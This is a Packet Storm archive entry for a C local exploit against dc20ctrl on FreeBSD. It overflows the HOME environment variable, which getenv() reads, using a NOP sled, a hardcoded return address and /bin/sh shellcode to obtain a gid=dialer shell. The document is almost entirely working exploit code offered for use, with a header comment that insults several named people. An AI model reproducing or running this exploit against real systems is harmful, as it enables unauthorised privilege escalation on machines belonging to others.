Dc20ctrl local exploit for FreeBSD - exploits a call to getenv() in session.c giving a gid=dialer shell.
66bd4c24f5f56a75a4d1f6950e5eda0d35c0338ec42daeabfc61f4b912e0f790/* dc20ctrl - this exploit is about as useful as the following people:
ALIEN88 - how many operz have you gone down on ?
VETESGIRL - VETESCAN ROX MY SOX @#$$ OMG$%$ U SHOULD MARKET THAT SHIT
TIMEX - KEEP OWNING THE EFNET CHANNELZ DOUD
PS: This exploits a call to getenv() in session.c, I don't believe this is one of the
bugs found by the freebsd team during their internal audit, atleast, not that I can see
from the patch info, oh well, useless either way=]
gives gid=dialer
-mray
joe@mindcrash-tech.com
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#define BSIZE 520
#define EIP 0xbfbfdcb8
#define NOP 0x90
#define PATH "/usr/local/bin/dc20ctrl"
char shellcode[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b"
"\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8"
"\xff\xff\xff/bin/sh\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
int main(int argc, char *argv[]) {
char *buf = NULL, *p = NULL;
long *addressp = NULL, address=EIP;
int offset=0,i=0;
if(argc > 1){
offset = atoi(argv[1]);
}
address -= offset;
if (!(buf = (char *)malloc(BSIZE))) {
printf("error malloc()\n");
exit(-1);
}
p = buf;
addressp = (long *) p;
for (i = 0; i < BSIZE; i+=4) {
*(addressp++) = address;
}
for (i = 0; i < (BSIZE - strlen(shellcode) - 4); i++) {
buf[i] = NOP;
}
p = buf + (BSIZE - strlen(shellcode) - 4);
for (i = 0; i < strlen(shellcode); i++) {
*(p++) = shellcode[i];
}
buf[BSIZE] = '\0';
printf("ADDRESS 0x%lx OFFSET %d\n", address,offset);
setenv("HOME", buf, 1);
execlp(PATH, "dc20ctrl","-P","alien88izretarded", 0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed